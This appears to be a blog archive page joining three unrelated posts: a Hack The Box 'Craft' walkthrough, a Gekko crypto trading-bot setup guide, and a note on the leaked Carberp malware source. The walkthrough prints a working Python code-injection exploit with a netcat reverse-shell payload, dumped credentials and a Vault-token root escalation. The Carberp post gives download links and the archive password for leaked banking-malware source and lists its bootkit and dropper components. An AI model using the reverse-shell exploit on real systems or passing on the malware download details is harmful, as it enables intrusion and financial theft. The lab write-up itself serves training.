Archive for the ‘How To’s’ Category

Craft.HTB

Posted: 2020/01/14 in How To's, htb

Walk-Thru for Craft.HTB

 

This is a detailed walk-thru for craft.htb written by dR1PPy

Craft.htb

Overall the host has been graded with a fair rating.
The path to user is not simple, but there are not a lot of rabbit holes to find yourself trapped in.
The path to root was fairly easy if you can catch the clue fast enough.
This was one of those rare machines where I was able to get root access with no privesc scripts.

This machine helped with understanding how to attack python based applications, and working with API’s.
Much thanks to rotarydrone for the challenge!

. * .. . * *
* * @()Ooc()* o .
(Q@*0CG*O() ___
|\_________/|/ _ \
| | | | | / | |
| | | | | | | |
| | | | | | | |
| | | | | | | |
| | | | | | | |
| | | | | \_| |
| | | | |\___/
|\_|__|__|_/|
\_________/

Services Scan

Services
========

host port proto name state info
---- ---- ----- ---- ----- ----
10.10.10.110 22 tcp ssh open OpenSSH 7.4p1 Debian 10+deb9u5 protocol 2.0
10.10.10.110 443 tcp ssl/http open nginx 1.15.8
10.10.10.110 6022 tcp ssh open protocol 2.0

So looks like we are dealing with HTTPS & SSH, no UDP based services were found.

Getting User Access

After port scanning we start with a visit to the HTTPS website.
From here we see links to 2 other URL’s which we add to our /etc/hosts

api.craft.htb
gogs.craft.htb

Reviewing both URL’s reveals more information on possible paths to attack.

We are presented with an API which lists its variables in a friendly how to page.

api

And a private code repository

gogs

We explore the Gogs repos and find repository for the API which allows us to read the source code.

After reviewing the code we find some info on how it creates auth tokens.
What DB is being used and what a few test scripts to verify things.
We also find some user credentials which was removed in a previous commit.

gogs-leak

dinesh:4aUh0A8PbVJxgd

We try the credentials for SSH but are unsuccessful. Let’s keep looking at the code.

We also notice from the issues page a weakness was reported around a parameter that allows unsanitized input.

https://gogs.craft.htb/Craft/craft-api/issues/2

Maybe we can use this method to gain access?

Looking again at the test script in which we found our credentials, and we notice it was written to test this specific issue.

https://gogs.craft.htb/Craft/craft-api/raw/master/tests/test.py

So we download the test script and make a few minor modifications to get our attack moving.
We fight with our syntax for a bit but eventually get a shell back using the script below.

#!/usr/bin/env python

import requests
import json

response = requests.get('https://api.craft.htb/api/auth/login', auth=('dinesh', '4aUh0A8PbVJxgd'), verify=False)
json_response = json.loads(response.text)
token = json_response['token']

headers = { 'X-Craft-API-Token': token, 'Content-Type': 'application/json' }

# make sure token is valid
response = requests.get('https://api.craft.htb/api/auth/check', headers=headers, verify=False)
print(response.text)

print(response.text)

# create a sample brew with real ABV... should succeed.
print("Attacking ABV Variable")
brew_dict = {}

# Payloads that have failed [ nc direct calls, wget calls, curl calls, direct /bin/bash calls ]
brew_dict['abv'] = '__import__("os").system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.23 8088 >/tmp/f") & 0.15'

brew_dict['name'] = 'bullshit'
brew_dict['brewer'] = 'bullshit'
brew_dict['style'] = 'bullshit'

json_data = json.dumps(brew_dict)
response = requests.post('https://api.craft.htb/api/brew/', headers=headers, data=json_data, verify=False)

print(response.text)

Ok now we have reverse shell and we see we are root user!?
But we don’t find any user or root flags and some basic commands are not available (dir?)
Could this be a virtual instance or restricted shell?

We quickly validate we are in a docker image.

cat /proc/1/cgroup
10:perf_event:/docker/5a3d243127f5cfeb97bc6332eda2e4ceae19472421c0c5a7d226fb5fc1ef0f7c
9:blkio:/docker/5a3d243127f5cfeb97bc6332eda2e4ceae19472421c0c5a7d226fb5fc1ef0f7c
8:cpu,cpuacct:/docker/5a3d243127f5cfeb97bc6332eda2e4ceae19472421c0c5a7d226fb5fc1ef0f7c
7:memory:/docker/5a3d243127f5cfeb97bc6332eda2e4ceae19472421c0c5a7d226fb5fc1ef0f7c
6:pids:/docker/5a3d243127f5cfeb97bc6332eda2e4ceae19472421c0c5a7d226fb5fc1ef0f7c
5:freezer:/docker/5a3d243127f5cfeb97bc6332eda2e4ceae19472421c0c5a7d226fb5fc1ef0f7c
4:cpuset:/docker/5a3d243127f5cfeb97bc6332eda2e4ceae19472421c0c5a7d226fb5fc1ef0f7c
3:net_cls,net_prio:/docker/5a3d243127f5cfeb97bc6332eda2e4ceae19472421c0c5a7d226fb5fc1ef0f7c
2:devices:/docker/5a3d243127f5cfeb97bc6332eda2e4ceae19472421c0c5a7d226fb5fc1ef0f7c
1:name=systemd:/docker/5a3d243127f5cfeb97bc6332eda2e4ceae19472421c0c5a7d226fb5fc1ef0f7c

A quick enumeration of the Craft-API folder and we find an interesting settings file.

/ # find * | grep craft
opt/app/craft_api
opt/app/craft_api/api
opt/app/craft_api/api/auth
opt/app/craft_api/api/auth/__pycache__
opt/app/craft_api/api/auth/__pycache__/__init__.cpython-36.pyc
opt/app/craft_api/api/auth/endpoints
opt/app/craft_api/api/auth/endpoints/__pycache__
opt/app/craft_api/api/auth/endpoints/__pycache__/__init__.cpython-36.pyc
opt/app/craft_api/api/auth/endpoints/__pycache__/auth.cpython-36.pyc
opt/app/craft_api/api/auth/endpoints/auth.py
opt/app/craft_api/api/auth/endpoints/__init__.py
opt/app/craft_api/api/auth/__init__.py
opt/app/craft_api/api/__pycache__
opt/app/craft_api/api/__pycache__/__init__.cpython-36.pyc
opt/app/craft_api/api/__pycache__/restplus.cpython-36.pyc
opt/app/craft_api/api/__init__.py
opt/app/craft_api/api/brew
opt/app/craft_api/api/brew/__pycache__
opt/app/craft_api/api/brew/__pycache__/__init__.cpython-36.pyc
opt/app/craft_api/api/brew/__pycache__/serializers.cpython-36.pyc
opt/app/craft_api/api/brew/__pycache__/parsers.cpython-36.pyc
opt/app/craft_api/api/brew/__pycache__/operations.cpython-36.pyc
opt/app/craft_api/api/brew/parsers.py
opt/app/craft_api/api/brew/endpoints
opt/app/craft_api/api/brew/endpoints/__pycache__
opt/app/craft_api/api/brew/endpoints/__pycache__/__init__.cpython-36.pyc
opt/app/craft_api/api/brew/endpoints/__pycache__/brew.cpython-36.pyc
opt/app/craft_api/api/brew/endpoints/__init__.py
opt/app/craft_api/api/brew/endpoints/brew.py
opt/app/craft_api/api/brew/__init__.py
opt/app/craft_api/api/brew/serializers.py
opt/app/craft_api/api/brew/operations.py
opt/app/craft_api/api/restplus.py
opt/app/craft_api/__pycache__
opt/app/craft_api/__pycache__/__init__.cpython-36.pyc
opt/app/craft_api/__pycache__/settings.cpython-36.pyc
opt/app/craft_api/database
opt/app/craft_api/database/__pycache__
opt/app/craft_api/database/__pycache__/__init__.cpython-36.pyc
opt/app/craft_api/database/__pycache__/models.cpython-36.pyc
opt/app/craft_api/database/__init__.py
opt/app/craft_api/database/models.py
opt/app/craft_api/__init__.py
opt/app/craft_api/settings.py

And as suspected this file contains valuable data in the form of another set of credentials along with the CRAFT_API_SECRET.

# cat /opt/app/craft_api/settings.py
# Flask settings
FLASK_SERVER_NAME = 'api.craft.htb'
FLASK_DEBUG = False # Do not use debug mode in production

# Flask-Restplus settings
RESTPLUS_SWAGGER_UI_DOC_EXPANSION = 'list'
RESTPLUS_VALIDATE = True
RESTPLUS_MASK_SWAGGER = False
RESTPLUS_ERROR_404_HELP = False
CRAFT_API_SECRET = 'hz66OCkDtv8G6D'

# database
MYSQL_DATABASE_USER = 'craft'
MYSQL_DATABASE_PASSWORD = 'qLGockJ6G2J75O'
MYSQL_DATABASE_DB = 'craft'
MYSQL_DATABASE_HOST = 'db'
SQLALCHEMY_TRACK_MODIFICATIONS = False

Now we can use the dbtest.py script found in the Gogs repo to make use of our new credentials.
We see the cursor is set to select one row which really limits our scope, so we change that to select all rows.
Since nano is not available and vi is useless on this host we also modify the script to take command line variables for our SQL statements.

#!/usr/bin/env python

import pymysql

# test connection to mysql database

connection = pymysql.connect(host="db",
user="craft",
password="qLGockJ6G2J75O",
db="craft",
cursorclass=pymysql.cursors.DictCursor)

try:
with connection.cursor() as cursor:
sql = sys.args[1]
cursor.execute(sql)
result = cursor.fetchall()
print(result)

finally:
connection.close()

A quick test verifies it is working as expected.

/tmp # python ./dbtest.py "SELECT `id`, `brewer`, `name`, `abv` FROM `brew` LIMIT 1"
[{'id': 12, 'brewer': '10 Barrel Brewing Company', 'name': 'Pub Beer', 'abv': Decimal('0.050')}]

After some DB enumeration we find the info we are looking for with the following statement.

/tmp # python ./dbtest.py "SELECT * from craft.user"

[{'id': 1, 'username': 'dinesh', 'password': '4aUh0A8PbVJxgd'}, {'id': 4, 'username': 'ebachman', 'password': 'llJ77D8QFkLPQB'}, {'id': 5, 'username': 'gilfoyle', 'password': 'ZEU3N8WNM2rh4T'}]

Now we have 3 sets of credentials for the API & possibly gogs
dinesh:4aUh0A8PbVJxgd
ebachman:llJ77D8QFkLPQB
gilfoyle:ZEU3N8WNM2rh4T

We try the credentials for gilfoyle in Gogs and we find another code repo.
This one seems to have some SSH keys stored in the .ssh directory.

https://gogs.craft.htb/gilfoyle/craft-infra/src/master/.ssh

We use the SSH key and the password to get SSH access to the host as gilfoyle.
From here we find our user flag.

Getting Root Access

Even before we start to enumerate the host something stands out.
A hidden token file is found the users home folder

ls -lha
total 36K
drwx------ 4 gilfoyle gilfoyle 4.0K Feb 9 2019 .
drwxr-xr-x 3 root root 4.0K Feb 9 2019 ..
-rw-r--r-- 1 gilfoyle gilfoyle 634 Feb 9 2019 .bashrc
drwx------ 3 gilfoyle gilfoyle 4.0K Feb 9 2019 .config
-rw-r--r-- 1 gilfoyle gilfoyle 148 Feb 8 2019 .profile
drwx------ 2 gilfoyle gilfoyle 4.0K Feb 9 2019 .ssh
-r-------- 1 gilfoyle gilfoyle 33 Feb 9 2019 user.txt
-rw------- 1 gilfoyle gilfoyle 36 Feb 9 2019 .vault-token
-rw------- 1 gilfoyle gilfoyle 2.5K Feb 9 2019 .viminfo
gilfoyle@craft:~$ cat .vault-token
f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9

A quick google search for the file name returns information on one time token system.
We confirm this token file is valid.

gilfoyle@craft:~$ vault token lookup f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9
Key Value
--- -----
accessor 1dd7b9a1-f0f1-f230-dc76-46970deb5103
creation_time 1549678834
creation_ttl 0s
display_name root
entity_id n/a
expire_time
explicit_max_ttl 0s
id f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9
meta
num_uses 0
orphan true
path auth/token/root
policies [root]
ttl 0s

So after doing some research on how to use vault to authenticate SSH we find the following method to gain root access.

vault ssh root@localhost
WARNING: No -role specified. Use -role to tell Vault which ssh role to use for
authentication. In the future, you will need to tell Vault which role to use.
For now, Vault will attempt to guess based on the API response. This will be
removed in the Vault 1.1.
Vault SSH: Role: "root_otp"
WARNING: No -mode specified. Use -mode to tell Vault which ssh authentication
mode to use. In the future, you will need to tell Vault which mode to use.
For now, Vault will attempt to guess based on the API response. This guess
involves creating a temporary credential, reading its type, and then revoking
it. To reduce the number of API calls and surface area, specify -mode
directly. This will be removed in Vault 1.1.
Vault could not locate "sshpass". The OTP code for the session is displayed
below. Enter this code in the SSH password prompt. If you install sshpass,
Vault can automatically perform this step for you.
OTP for the session is: 8a4176e6-63a8-819e-b21d-7d725e9755f8
. * .. . * *
* * @()Ooc()* o .
(Q@*0CG*O() ___
|\_________/|/ _ \
| | | | | / | |
| | | | | | | |
| | | | | | | |
| | | | | | | |
| | | | | | | |
| | | | | \_| |
| | | | |\___/
|\_|__|__|_/|
\_________/

Password:
Linux craft.htb 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 27 04:53:14 2019
root@craft:~# cat root.txt
XXXXXXXXXXXXXXXXXXXXXXXX
root@craft:~#

And now that root is owned I have a strange urge to drink some craft beers!
Hope you enjoyed the write up!


Learning Resources Used for Reference in this Attack

Reference for the Python injection attack used to gain initial foothold.
https://sethsec.blogspot.com/2016/11/exploiting-python-code-injection-in-web.html

Reference used to get proper syntax for our initial foothold.
https://gist.githubusercontent.com/compermisos/db8914f5ad1fab6107bb56e7afc5a3c5/raw/55013125f1cd8e78459e6d5d19e16021d3b0a6df/simpleSocket.sh

Reference for identifying docker instances.

How to know you are inside a Docker container

Reference for the changes to the dbtest.py script.
https://dev.mysql.com/doc/connector-python/en/connector-python-api-mysqlcursor-fetchall.html

Reference for Vault commands used.
https://www.vaultproject.io/docs/commands/token/lookup.html
https://www.vaultproject.io/docs/secrets/ssh/one-time-ssh-passwords.html

If you enjoyed the challenge give some respect to the creator rotarydrone
https://www.hackthebox.eu/home/users/profile/3067

Not a Reference but Just a Super Cool Tool to Use with HTB Labs
https://github.com/zachhanson94/htbcli

In this article we will cover how to quickly setup a trading bot for crypto-currencies. As the difficulty for BTC continues to rise the profit in mining coins continues to drop. A good method to make up those losses is with a trading bot which will work to increase your profit margin by making the moves needed on the market while you are away.

For this we will use the following tools:

  • Turnkey Linux NODE.js VM
  • Gekko Trading Bot
  • Mt.Gox or BTCe account (w/ funds)

Setting up the Environment

First we will download the following Linux VM image

http://www.turnkeylinux.org/nodejs

(alternately you can just run the bot directly by downloading & installing http://nodejs.org/)

For step by step instructions for a Windows based install refer to this:

https://github.com/askmike/gekko/blob/master/docs/installing_gekko_on_windows.md

After downloading and booting the Linux VM image we prepare the host. After initial boot we choose the “Quit” option from the menu to get to a shell.

Once there:

apt-get install byobu
adduser coinmaker

(assign some strong passwords if required setup SSH keys)

git clone https://github.com/askmike/gekko.git /opt/gekko
chown -R coinmaker /opt/gekko
su – coinmaker
cd /opt/gekko/ && npm install

We can now run the bot to verify its functional:

node gekko

We can refer to https://github.com/askmike/gekko/blob/master/docs/Configuring_gekko.md for a full list of options available for the config.js file. To get going quickly change the following options:

cp config.js config.bkup && vi config.js

  • Change the “exchange” to your preferred trading hub
  • Change the currency setting to match your desired currency
  • If you want to enable trading then add the API key/secret generated by your trading hub for your account
  • Also change the tradingEnabled to true to allow trading.
config.normal = {
  enabled: true,
  exchange: 'MtGox', // 'MtGox', 'BTCe', 'Bitstamp' or 'cexio'
  currency: 'USD',
  asset: 'BTC',
  tradingEnabled: false,
  key: '',
  secret: '',
  username: 0 // only fill this is when using Bitstamp or cexio
}

Also ensure the “Advanced section” matches the settings in the config.normal section if you enable trading. This would include the Trading Hub set to “true” along with the same API key/secret used.

Now we can launch the bot and monitor its performance and trading from the console

 byobu && node gekko

2013-12-10 18:12:11 (INFO): Profit reporter active on simulated balance
2013-12-10 18:12:11 (INFO): Calculating EMA on historical data…
2013-12-10 18:14:31 (INFO): ADVICE is to BUY @ xxx.xxx (x.xxx)

The point is ladies and gentlemen that greed, for lack of a better word, is good.

And that’s it! Take a snapshot of the VM instance and clone away if you need to trade on more than one hub at a time.

Very interesting source code leak today for the Carberp malware family.
This black market malware once being offered for $40k will surely be of interest to anyone who conducts malware & botnet analysis. The leak included a few other tools that helped make it so successful like the bootloader, MC obfuscate, along with various functions taken from other malware source code like Zeus and Spyeye.

Which begs the question, how do we address the leakage and sharing of malware source code in the public domain?

Here is a more detailed story behind the leak: http://threatpost.com/carberp-source-code-leaked/

Here is more info on the information leaked:

Download
Link 1: http://multiupload.nl/A6CFLK4U6M (as of this posting this link seems dead)
Link 2: https://mega.co.nz/#!0YsXWBRD!CMqd9nrm1d0XABKlifI9vmxprpQ6RnfsdhBHeKrDXao (This one feels lucky!)

The password is:
Kj1#w2*LadiOQpw3oi029)K Oa(28)uspeh

Analysis of the package
Via kernelmode.info:

Ursnif related

pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\VNCDLL.dll
pro\all source\TZ\vnc\VNCd.7z->VNCd/VNCDLL.dll
pro\source builder plugins inj’s modules etc\WndRec\vncdemo\VNCDLL.dll
pro\source builder plugins inj’s modules etc\Сорцы и Модули\VNCd.7z->VNCd/VNCDLL.dll

Rovnix related (BKLoader itself)

pro\all source\bootkit.old\KLoader\release\i386\kloader.sys
pro\all source\BootkitDropper\nbuild\SrcDir\bksetup.exe
pro\all source\test\bootkit\1\bksetup.exe
pro\all source\test\bootkit\1\setupdll.dll
pro\all source\test\bootkit\bksetup.exe
pro\all source\test\bootkit\setupdll.dll
pro\all source\TZ\bootkit\bin\bksetup.exe
pro\all source\TZ\bootkit\bin\setupdll.dll
pro\all source\Инфа по буткиту\Бинарник БК\LatestBk\BK2.8.2\biin\BkSetup.dll
pro\all source\Инфа по буткиту\Бинарник БК\LatestBk\BK2.8.2\bin\release\i386\BkSetup.dll
pro\all source\Инфа по буткиту\Бинарник БК\LatestBk\BK2.8.2_KIP\BK2.8.2_KIP\biin\BkSetup.dll
pro\all source\Инфа по буткиту\Бинарник БК\LatestBk\BK2.8.2_KIP\BK2.8.2_KIP\bin\release\i386\SetupDll.dll
pro\all source\Инфа по буткиту\Инсталятор БК\BootkitDropperPlugBuild\SrcDir\BkSetup.dll
pro\all source\temp\marazm\Droper\Droper_23.01.2012.rar->build\bin\BkSetup.exe
pro\all source\temp\marazm\Droper\Droper_23.01.2012.rar->build\bin\SetupDll.dll
pro\all source\temp\marazm\Droper\Droper_23.01.2012.rar->build\Release\bksetup.exe
pro\all source\temp\marazm\Droper\Droper_23.01.2012.rar->build\Release\setupdll.dll
pro\all source\temp\marazm\Droper\Droper_23.01.2012\build\bin\BkSetup.exe
pro\all source\temp\marazm\Droper\Droper_23.01.2012\build\bin\SetupDll.dll
pro\all source\temp\marazm\Droper\Droper_23.01.2012\build\Release\bksetup.exe
pro\all source\temp\marazm\Droper\Droper_23.01.2012\build\Release\setupdll.dll
pro\source builder plugins inj’s modules etc\Сорцы и Модули\Rootkit.7z->DrvTest/debug/DrvTest.sys
pro\source builder plugins inj’s modules etc\Сорцы и Модули\Rootkit.7z->DrvTest/debug/SpoolNetAdvr.sy_
pro\all source\bootkit\bin\Release\i386\kloader.sys
pro\all source\temp\marazm\Droper\Droper_23.01.2012.rar->build\driver_i386\kloader.sys
pro\all source\temp\marazm\Droper\Droper_23.01.2012\build\driver_i386\kloader.sys
pro\all source\TZ\bootkit\BK\bin\release\i386\kloader.sys
pro\all source\bootkit.old\KLoader\release\amd64\kloader.sys
pro\all source\BootkitDropper\nbuild\SrcDir\BkSetup.dll

Alureon related (dropper of old variants, still ITW)

pro\all source\DropSploit1.rar->DropSploit1\out\builder_Release.exe
pro\all source\DropSploit1.rar->DropSploit1\out\Release\dropper.exe
pro\all source\DropSploit1\out\builder_Release.exe
pro\all source\DropSploit1\out\Release\dropper.exe
pro\all source\DropSploit\out\builder_Release.exe
pro\all source\DropSploit\out\builder_Release.sys
pro\all source\DropSploit\out\dropper.dll
pro\all source\DropSploit\out\Release\dropper.dll
pro\all source\DropSploit\test\1\builder_Release.exe
pro\all source\DropSploit\test\2\builder_Release.exe
pro\all source\DropSploit\test\3\builder_Release.exe
pro\all source\DropSploit\test\5\builder_Release.exe
pro\all source\DropSploit\test\6\builder_Release.exe
pro\all source\DropSploit\test\7\builder_Release.exe
pro\all source\DropSploit\test\8\builder_Release.exe

Claywhist (VNC) related
pro\all source\RemoteCtl\Release\hvnc.exe

Phdet related

pro\all source\TZ\kill_os\bin\os_kill_debug.exe
pro\all source\TZ\kill_os\os_kill_src.7z->os_kill_src/bin/os_kill.exe
pro\all source\TZ\kill_os\os_kill_src.7z->os_kill_src/bin/os_kill_debug.exe
pro\source builder plugins inj’s modules etc\Сорцы и Модули\os_kill_src.7z->os_kill_src/bin/os_kill.exe
pro\source builder plugins inj’s modules etc\Сорцы и Модули\os_kill_src.7z->os_kill_src/bin/os_kill_debug.exe

Zeus related

pro\all source\GrabberIE_FF\Release\GrabberIE_FF.dll
pro\all source\temp\zeus src.rar->zeus src\output\builder\zsb.exe
pro\all source\temp\zeus src.rar->zeus src\output\client32.bin
pro\all source\ZeuS 2.0.8.9\output\builder\zsb.exe
pro\source builder plugins inj’s modules etc\Сорцы и Модули\zeus2089.7z->zeus2089/output/builder/zsb.exe
pro\source builder plugins inj’s modules etc\Сорцы и Модули\zeus2089.7z->zeus2089/output/client32.bin

SpyEye related

pro\source builder plugins inj’s modules etc\Сорцы и Модули\spyinject2.zip->iehookdll_mod.dll
pro\all source\RemoteCtl\Release\rdp.dll
pro\all source\temp\rdp.dll
pro\all source\temp\rdp.exe
pro\all source\TZ\rdp\rdp.plug
pro\source builder plugins inj’s modules etc\plugs\rdp.plug

Vundo related

pro\all source\AgentFullTest.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\BootkitRunBot.dll
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\MiniLoader.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\new.exe
pro\all source\BJWJ\Builds\Bin\Release\blockav2.exe
pro\all source\BJWJ\Builds\Bin\Release\BootkitRunBot.dll
pro\all source\BJWJ\Builds\Bin\Release\MiniLoader.exe
pro\all source\BJWJ\Builds\Bin\Release\new.exe
pro\all source\bootkit\BkBuild\BootkitRunBot.dll
pro\all source\Demo_Cur2\WhiteJoe\Release\WhiteJOE_Bank.exe
pro\all source\keys\Builds\Bin\Debug\RU.exe
pro\all source\temp\marazm\Droper\Droper_23.01.2012.rar->build\WhiteJoe.dll
pro\all source\temp\marazm\Droper\Droper_23.01.2012\build\WhiteJoe.dll
pro\all source\Инфа по буткиту\Инсталятор БК\BootkitDropperPlugBuild\SrcDir\BkInstaller.dll
pro\source builder plugins inj’s modules etc\ConfigBuilder\ConfigBuilder\ConfigBuilder.exe
pro\source builder plugins inj’s modules etc\ConfigBuilder\for test\ConfigBuilder.exe

Carberp itself

pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\BootkitDropper.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\bot.plug
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\disktest.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\FakeDll.plug
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\RU_Az1.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\RU_Az_DBG.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\RU_Az_DBG1.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\RU_Az_DBG2.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\RU_Az_FDI_DBG.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\RU_DBG.exe
pro\all source\BJWJ\Builds\Bin\Release\bki.plug
pro\all source\BJWJ\Builds\Bin\Release\bktest.exe
pro\all source\BJWJ\Builds\Bin\Release\blockav.exe
pro\all source\BJWJ\Builds\Bin\Release\blockav1.exe
pro\all source\BJWJ\Builds\Bin\Release\bootkit.exe
pro\all source\BJWJ\Builds\Bin\Release\BootkitDropper.exe
pro\all source\BJWJ\Builds\Bin\Release\bot.plug
pro\all source\BJWJ\Builds\Bin\Release\docfind.exe
pro\all source\BJWJ\Builds\Bin\Release\first.plug
pro\all source\BJWJ\Builds\Bin\Release\Full.exe
pro\all source\BJWJ\Builds\Bin\Release\ifobstst.exe
pro\all source\BJWJ\Builds\Bin\Release\livrus.exe
pro\all source\BJWJ\Builds\Bin\Release\Loader_dll.dll
pro\all source\BJWJ\Builds\Bin\Release\mmm.exe
pro\all source\BJWJ\Builds\Bin\Release\mybot.exe
pro\all source\BJWJ\Builds\Bin\Release\mytest.exe
pro\all source\BJWJ\Builds\Bin\Release\ola.exe
pro\all source\BJWJ\Builds\Bin\Release\ola1.exe
pro\all source\BJWJ\Builds\Bin\Release\ola2.exe
pro\all source\BJWJ\Builds\Bin\Release\RU_Az.exe
pro\all source\BJWJ\Builds\Bin\Release\RU_Az1.exe
pro\all source\BJWJ\Builds\Bin\Release\RU_Az_FDI.exe
pro\all source\BJWJ\Builds\Bin\Release\RU_Az_serg.exe
pro\all source\BJWJ\Builds\Bin\Release\second.plug
pro\all source\BJWJ\Builds\Bin\Release\test.exe
pro\all source\BJWJ\Builds\Bin\Release\testftp.exe
pro\all source\BJWJ\Builds\Bin\Release\testnew.exe
pro\all source\BJWJ\Builds\Bin\Release\testtt.exe
pro\all source\BJWJ\Builds\Bin\Release\tinytst.exe
pro\all source\BJWJ\Builds\Bin\Release\tst.exe
pro\all source\BJWJ\Builds\Bin\Release\vnctest.exe
pro\all source\BJWJ\Builds\Bin\Release\wndrec.exe
pro\all source\BJWJ\Builds\Bin\Release\wndrec2.exe
pro\all source\BootkitDropper\Bin\RDEBUG_CONFIG\WhiteJoe.exe
pro\all source\BootkitDropper\Bin\RDEBUG_CONFIG\WhiteJoeRebootPing.exe
pro\all source\BootkitDropper\Bin\Release\WhiteJoe.exe
pro\all source\BootkitDropper\Bin\Release\WhiteJoeRebootPing.exe
pro\all source\BootkitDropper\nbuild\SrcDir\WhiteJoe.exe
pro\all source\BootkitDropper\nbuild\SrcDir\WhiteJoeRebootPing.dll
pro\all source\BootkitDropper\nbuild\SrcDir\WhiteJoeRebootPing.exe
pro\all source\Bot Builder\WhiteJoeRebootPing.exe
pro\all source\temp\2012-07-04_FakeDllFiles\bot.plug
pro\all source\temp\marazm\Droper\WhiteJoe.exe
pro\all source\test\test\ola.exe
pro\all source\Инфа по буткиту\Инсталятор БК\BootkitDropperPlugBuild\SrcDir\Bot.plug
pro\all source\Инфа по буткиту\Инсталятор БК\BootkitDropperPlugBuild\SrcDir\Loader_dll.dll
pro\all source\Инфа по буткиту\Инсталятор БК\BootkitDropperPlugBuild\SrcDir\WhiteJoeRebootPing.dll
pro\source builder plugins inj’s modules etc\Full.exe
pro\source builder plugins inj’s modules etc\Full_btc.exe
pro\source builder plugins inj’s modules etc\plugs\bki.plug
pro\source builder plugins inj’s modules etc\plugs\bki_log.plug
pro\source builder plugins inj’s modules etc\plugs\bot.plug
pro\source builder plugins inj’s modules etc\plugs\bot_log.plug
pro\source builder plugins inj’s modules etc\plugs\log\bki.plug
pro\source builder plugins inj’s modules etc\plugs\log\bot.plug
pro\source builder plugins inj’s modules etc\RU_Az_btc.exe
pro\source builder plugins inj’s modules etc\RU_Az_if.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\DBG_bot.plug
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\Full.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\Full_SB.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\Full_SB_hnt.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\RU.exe
pro\all source\BJWJ\Builds\Bin\Release\mmmm.exe
pro\all source\BJWJ\Builds\Bin\Release\RU.exe
pro\all source\Demo_Cur.rar->Demo_Cur\WhiteJoe\Debug\WhiteJOE_Bank.exe
pro\all source\Demo_Cur2\WhiteJoe\Debug\WhiteJOE_Bank.exe
pro\all source\Demo_cur\WhiteJoe\Release\WhiteJOE_Bank.exe
pro\all source\Demo_cur_old.7z->WhiteJoe/Debug/WhiteJOE_Bank.exe
pro\all source\keys\Builds\Bin\Release\RU.exe
pro\source builder plugins inj’s modules etc\InjTest.exe
pro\all source\BJWJ\Builds\Bin\BootkitTest\Loader_dll.dll
pro\all source\temp\marazm\Droper\Droper_23.01.2012.rar->build\Loader_dll.dll
pro\all source\temp\marazm\Droper\Droper_23.01.2012\build\Loader_dll.dll
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\CoreDll.dll
pro\all source\BootkitDropper\Bin\Debug\WhiteJoe.exe
pro\all source\BootkitDropper\Bin\Debug\WhiteJoeRebootPing.dll
pro\all source\BootkitDropper\Bin\Debug\WhiteJoeRebootPing.exe
pro\all source\Demo_Cur.rar->Demo_Cur\WhiteJoe\Release\WhiteJOE_Bank.exe
pro\all source\Demo_cur_old.7z->WhiteJoe/Release/WhiteJOE_Bank.exe
pro\all source\Locker\bin\Debug\locker.exe
pro\all source\temp\Demo_cur.7z->Demo_cur/WhiteJoe/Release/WhiteJOE_Bank.exe
pro\all source\temp\Demo_cur\WhiteJoe\Release\WhiteJOE_Bank.exe
pro\all source\TZ\ifobs\Demo_ifobs.7z->Demo_cur/WhiteJoe/Release/WhiteJOE_Bank.exe
pro\all source\TZ\ifobs\dll\iFOBSBal\Demo_iFOBS_src.7z->Demo_cur/WhiteJoe/Release/WhiteJOE_Bank.exe
pro\all source\TZ\ifobs\dll\iFOBSBal\WhiteJOE_Bank.exe
pro\all source\TZ\ifobs\iFobsLdr.7z->Demo_cur/WhiteJoe/Release/WhiteJOE_Bank.exe
pro\all source\TZ\ifobs\src2\Demo_cur\WhiteJoe\Release\WhiteJOE_Bank.exe
pro\all source\WndRec\output\log\IBank\1237\WhiteJoe\Release\WhiteJOE_Bank.exe
pro\all source\BootkitDropper\Bin\RDEBUG_CONFIG\WhiteJoe.dll
pro\all source\BootkitDropper\Bin\RDEBUG_CONFIG\WhiteJoeRebootPing.dll
pro\all source\BootkitDropper\Bin\Release\WhiteJoeRebootPing.dll
pro\all source\BootkitDropper\nbuild\SrcDir\WhiteJoe.dll
pro\all source\bootkit\BkBuild\ping.dll
pro\all source\temp\marazm\Droper\WhiteJoe.dll
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\Loader.exe

Stoned framework with Black Hat Europe 2007 Vipin Kumar POC, detected as Sinowal
pro\source builder plugins inj’s modules etc\Сорцы и Модули\Stoned Bootkit Framework.zip

There is also a copy of Win32 Obfuscator known as Mystic Compressor.

adminpanel без иконки\bot_adm\cache\cryptor\CRYPTOR.EXE
pro\all source\BootkitDropper\nbuild\Tools\Mystic.exe
pro\all source\Locker\build\Tools\mystic.exe
pro\all source\test\Mystic.exe
pro\all source\Инфа по буткиту\Инсталятор БК\BootkitDropperPlugBuild\Tools\Mystic.exe

Sometimes it really fun to watch people stumble about.
